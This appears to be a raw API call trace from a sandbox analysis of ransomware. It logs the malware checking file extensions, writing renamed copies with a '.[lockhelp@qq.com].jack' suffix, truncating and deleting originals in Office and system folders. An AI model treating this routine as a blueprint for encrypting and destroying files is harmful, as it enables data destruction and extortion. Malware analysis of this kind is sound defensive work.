lstrlenW (lpString=".dbf") returned 4 [0198.690] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0198.690] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned 44 [0198.690] lstrlenW (lpString=".1cd") returned 4 [0198.690] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0198.690] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned 44 [0198.690] lstrlenW (lpString=".jpg") returned 4 [0198.690] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0198.690] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0198.690] lstrlenW (lpString="ParameterInfo.xml") returned 17 [0198.690] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\ParameterInfo.xml" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0198.692] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3b9ff14 | out: lpFileSize=0x3b9ff14*=272046) returned 1 [0198.692] CloseHandle (hObject=0x410) returned 1 [0198.692] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\ParameterInfo.xml" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml")) returned 0x80 [0198.692] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\ParameterInfo.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0198.692] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\ParameterInfo.xml" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0198.692] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.692] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.692] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\ParameterInfo.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0198.693] GetLastError () returned 0x0 [0198.693] ReadFile (in: hFile=0x410, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x426ae, lpOverlapped=0x0) returned 1 [0198.703] WriteFile (in: hFile=0x430, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0x426b0, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0x426b0, lpOverlapped=0x0) returned 1 [0198.708] ReadFile (in: hFile=0x410, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.708] WriteFile (in: hFile=0x430, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0xf6, lpOverlapped=0x0) returned 1 [0198.708] SetEndOfFile (hFile=0x430) returned 1 [0198.709] CloseHandle (hObject=0x430) returned 1 [0199.137] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.137] SetEndOfFile (hFile=0x410) returned 1 [0199.142] CloseHandle (hObject=0x410) returned 1 [0199.142] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\ParameterInfo.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0199.142] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\ParameterInfo.xml" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml")) returned 1 [0199.143] lstrlenW (lpString="C:\\588bce7c90097ed212\\ParameterInfo.xml") returned 39 [0199.143] lstrlenW (lpString="C:\\588bce7c90097ed212\\ParameterInfo.xml") returned 39 [0199.143] lstrlenW (lpString=".doc") returned 4 [0199.143] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0199.143] lstrlenW (lpString=".docx") returned 5 [0199.143] lstrcmpiW (lpString1=".docx", lpString2="o.xml") returned -1 [0199.143] lstrlenW (lpString=".pdf") returned 4 [0199.143] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0199.143] lstrlenW (lpString=".xls") returned 4 [0199.143] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0199.143] lstrlenW (lpString=".xlsx") returned 5 [0199.143] lstrcmpiW (lpString1=".xlsx", lpString2="o.xml") returned -1 [0199.143] lstrlenW (lpString=".ppt") returned 4 [0199.143] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0199.143] lstrlenW (lpString="C:\\588bce7c90097ed212\\ParameterInfo.xml") returned 39 [0199.143] lstrlenW (lpString=".zip") returned 4 [0199.143] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0199.143] lstrlenW (lpString=".rar") returned 4 [0199.143] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0199.143] lstrlenW (lpString=".bz2") returned 4 [0199.143] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0199.143] lstrlenW (lpString=".7z") returned 3 [0199.143] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0199.144] lstrlenW (lpString="C:\\588bce7c90097ed212\\ParameterInfo.xml") returned 39 [0199.144] lstrlenW (lpString=".dbf") returned 4 [0199.144] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0199.144] lstrlenW (lpString="C:\\588bce7c90097ed212\\ParameterInfo.xml") returned 39 [0199.144] lstrlenW (lpString=".1cd") returned 4 [0199.144] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0199.144] lstrlenW (lpString="C:\\588bce7c90097ed212\\ParameterInfo.xml") returned 39 [0199.144] lstrlenW (lpString=".jpg") returned 4 [0199.144] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0199.144] lstrlenW (lpString="C:\\588bce7c90097ed212\\ParameterInfo.xml") returned 39 [0199.144] lstrlenW (lpString="C:\\588bce7c90097ed212\\ParameterInfo.xml") returned 39 [0199.144] lstrlenW (lpString=".doc") returned 4 [0199.144] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0199.144] lstrlenW (lpString=".docx") returned 5 [0199.144] lstrcmpiW (lpString1=".docx", lpString2="o.xml") returned -1 [0199.144] lstrlenW (lpString=".pdf") returned 4 [0199.144] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0199.144] lstrlenW (lpString=".xls") returned 4 [0199.144] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0199.144] lstrlenW (lpString=".xlsx") returned 5 [0199.144] lstrcmpiW (lpString1=".xlsx", lpString2="o.xml") returned -1 [0199.144] lstrlenW (lpString=".ppt") returned 4 [0199.144] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0199.144] lstrlenW (lpString="C:\\588bce7c90097ed212\\ParameterInfo.xml") returned 39 [0199.144] lstrlenW (lpString=".zip") returned 4 [0199.144] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0199.145] lstrlenW (lpString=".rar") returned 4 [0199.145] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0199.145] lstrlenW (lpString=".bz2") returned 4 [0199.145] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0199.145] lstrlenW (lpString=".7z") returned 3 [0199.145] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0199.145] lstrlenW (lpString="C:\\588bce7c90097ed212\\ParameterInfo.xml") returned 39 [0199.145] lstrlenW (lpString=".dbf") returned 4 [0199.145] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0199.145] lstrlenW (lpString="C:\\588bce7c90097ed212\\ParameterInfo.xml") returned 39 [0199.145] lstrlenW (lpString=".1cd") returned 4 [0199.145] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0199.145] lstrlenW (lpString="C:\\588bce7c90097ed212\\ParameterInfo.xml") returned 39 [0199.145] lstrlenW (lpString=".jpg") returned 4 [0199.145] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0199.145] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0199.145] lstrlenW (lpString="OfficeUpdateSchedule.xml") returned 24 [0199.145] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeupdateschedule.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0199.146] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3b9ff14 | out: lpFileSize=0x3b9ff14*=4782) returned 1 [0199.146] CloseHandle (hObject=0x410) returned 1 [0199.147] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeupdateschedule.xml")) returned 0x20 [0199.147] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeupdateschedule.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0199.147] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeupdateschedule.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0199.147] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.147] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.147] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeupdateschedule.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0199.148] GetLastError () returned 0x0 [0199.148] ReadFile (in: hFile=0x410, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x12ae, lpOverlapped=0x0) returned 1 [0199.185] WriteFile (in: hFile=0x3d4, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0x12b0, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0x12b0, lpOverlapped=0x0) returned 1 [0199.186] ReadFile (in: hFile=0x410, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x0, lpOverlapped=0x0) returned 1 [0199.186] WriteFile (in: hFile=0x3d4, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0x104, lpOverlapped=0x0) returned 1 [0199.186] SetEndOfFile (hFile=0x3d4) returned 1 [0199.187] CloseHandle (hObject=0x3d4) returned 1 [0199.189] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.189] SetEndOfFile (hFile=0x410) returned 1 [0199.190] CloseHandle (hObject=0x410) returned 1 [0199.190] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0199.191] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeupdateschedule.xml")) returned 1 [0199.191] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned 82 [0199.191] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned 82 [0199.191] lstrlenW (lpString=".doc") returned 4 [0199.191] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0199.191] lstrlenW (lpString=".docx") returned 5 [0199.191] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0199.191] lstrlenW (lpString=".pdf") returned 4 [0199.191] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0199.191] lstrlenW (lpString=".xls") returned 4 [0199.191] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0199.191] lstrlenW (lpString=".xlsx") returned 5 [0199.191] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0199.191] lstrlenW (lpString=".ppt") returned 4 [0199.191] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0199.191] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned 82 [0199.192] lstrlenW (lpString=".zip") returned 4 [0199.192] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0199.192] lstrlenW (lpString=".rar") returned 4 [0199.192] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0199.192] lstrlenW (lpString=".bz2") returned 4 [0199.192] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0199.192] lstrlenW (lpString=".7z") returned 3 [0199.192] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0199.192] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned 82 [0199.192] lstrlenW (lpString=".dbf") returned 4 [0199.192] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0199.192] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned 82 [0199.192] lstrlenW (lpString=".1cd") returned 4 [0199.192] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0199.192] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned 82 [0199.192] lstrlenW (lpString=".jpg") returned 4 [0199.192] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0199.192] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned 82 [0199.192] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned 82 [0199.192] lstrlenW (lpString=".doc") returned 4 [0199.192] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0199.192] lstrlenW (lpString=".docx") returned 5 [0199.192] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0199.192] lstrlenW (lpString=".pdf") returned 4 [0199.192] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0199.192] lstrlenW (lpString=".xls") returned 4 [0199.192] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0199.193] lstrlenW (lpString=".xlsx") returned 5 [0199.193] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0199.193] lstrlenW (lpString=".ppt") returned 4 [0199.193] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0199.193] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned 82 [0199.193] lstrlenW (lpString=".zip") returned 4 [0199.193] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0199.193] lstrlenW (lpString=".rar") returned 4 [0199.193] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0199.193] lstrlenW (lpString=".bz2") returned 4 [0199.193] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0199.193] lstrlenW (lpString=".7z") returned 3 [0199.193] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0199.193] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned 82 [0199.193] lstrlenW (lpString=".dbf") returned 4 [0199.193] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0199.193] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned 82 [0199.193] lstrlenW (lpString=".1cd") returned 4 [0199.193] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0199.193] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned 82 [0199.193] lstrlenW (lpString=".jpg") returned 4 [0199.193] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0199.193] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0199.194] lstrlenW (lpString="ServiceWatcherSchedule.xml") returned 26 [0199.194] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\servicewatcherschedule.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0199.194] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3b9ff14 | out: lpFileSize=0x3b9ff14*=4450) returned 1 [0199.194] CloseHandle (hObject=0x410) returned 1 [0199.194] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\servicewatcherschedule.xml")) returned 0x20 [0199.195] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\servicewatcherschedule.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0199.195] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\servicewatcherschedule.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0199.195] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.195] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.195] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\servicewatcherschedule.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0199.195] GetLastError () returned 0x0 [0199.195] ReadFile (in: hFile=0x410, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x1162, lpOverlapped=0x0) returned 1 [0199.234] WriteFile (in: hFile=0x3d4, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0x1170, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0x1170, lpOverlapped=0x0) returned 1 [0199.235] ReadFile (in: hFile=0x410, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x0, lpOverlapped=0x0) returned 1 [0199.235] WriteFile (in: hFile=0x3d4, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0x108, lpOverlapped=0x0) returned 1 [0199.236] SetEndOfFile (hFile=0x3d4) returned 1 [0199.236] CloseHandle (hObject=0x3d4) returned 1 [0199.237] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.237] SetEndOfFile (hFile=0x410) returned 1 [0199.238] CloseHandle (hObject=0x410) returned 1 [0199.238] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0199.239] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\servicewatcherschedule.xml")) returned 1 [0199.239] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned 84 [0199.239] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned 84 [0199.239] lstrlenW (lpString=".doc") returned 4 [0199.239] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0199.239] lstrlenW (lpString=".docx") returned 5 [0199.239] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0199.239] lstrlenW (lpString=".pdf") returned 4 [0199.239] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0199.239] lstrlenW (lpString=".xls") returned 4 [0199.239] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0199.239] lstrlenW (lpString=".xlsx") returned 5 [0199.239] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0199.239] lstrlenW (lpString=".ppt") returned 4 [0199.239] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0199.239] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned 84 [0199.239] lstrlenW (lpString=".zip") returned 4 [0199.239] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0199.239] lstrlenW (lpString=".rar") returned 4 [0199.239] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0199.239] lstrlenW (lpString=".bz2") returned 4 [0199.240] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0199.240] lstrlenW (lpString=".7z") returned 3 [0199.240] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0199.240] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned 84 [0199.240] lstrlenW (lpString=".dbf") returned 4 [0199.240] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0199.240] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned 84 [0199.240] lstrlenW (lpString=".1cd") returned 4 [0199.240] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0199.240] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned 84 [0199.240] lstrlenW (lpString=".jpg") returned 4 [0199.240] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0199.240] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned 84 [0199.240] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned 84 [0199.240] lstrlenW (lpString=".doc") returned 4 [0199.240] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0199.240] lstrlenW (lpString=".docx") returned 5 [0199.240] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0199.240] lstrlenW (lpString=".pdf") returned 4 [0199.240] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0199.240] lstrlenW (lpString=".xls") returned 4 [0199.240] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0199.240] lstrlenW (lpString=".xlsx") returned 5 [0199.240] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0199.240] lstrlenW (lpString=".ppt") returned 4 [0199.241] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0199.241] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned 84 [0199.241] lstrlenW (lpString=".zip") returned 4 [0199.241] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0199.241] lstrlenW (lpString=".rar") returned 4 [0199.241] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0199.241] lstrlenW (lpString=".bz2") returned 4 [0199.241] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0199.241] lstrlenW (lpString=".7z") returned 3 [0199.241] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0199.241] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned 84 [0199.241] lstrlenW (lpString=".dbf") returned 4 [0199.241] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0199.241] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned 84 [0199.241] lstrlenW (lpString=".1cd") returned 4 [0199.241] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0199.241] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned 84 [0199.241] lstrlenW (lpString=".jpg") returned 4 [0199.241] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0199.241] lstrcmpiW (lpString1=".avi", lpString2=".jack") returned -1 [0199.241] lstrlenW (lpString="boxed-delete.avi") returned 16 [0199.241] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0199.251] GetFileSizeEx (in: hFile=0x434, lpFileSize=0x3b9ff14 | out: lpFileSize=0x3b9ff14*=48936) returned 1 [0199.251] CloseHandle (hObject=0x434) returned 1 [0199.251] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common 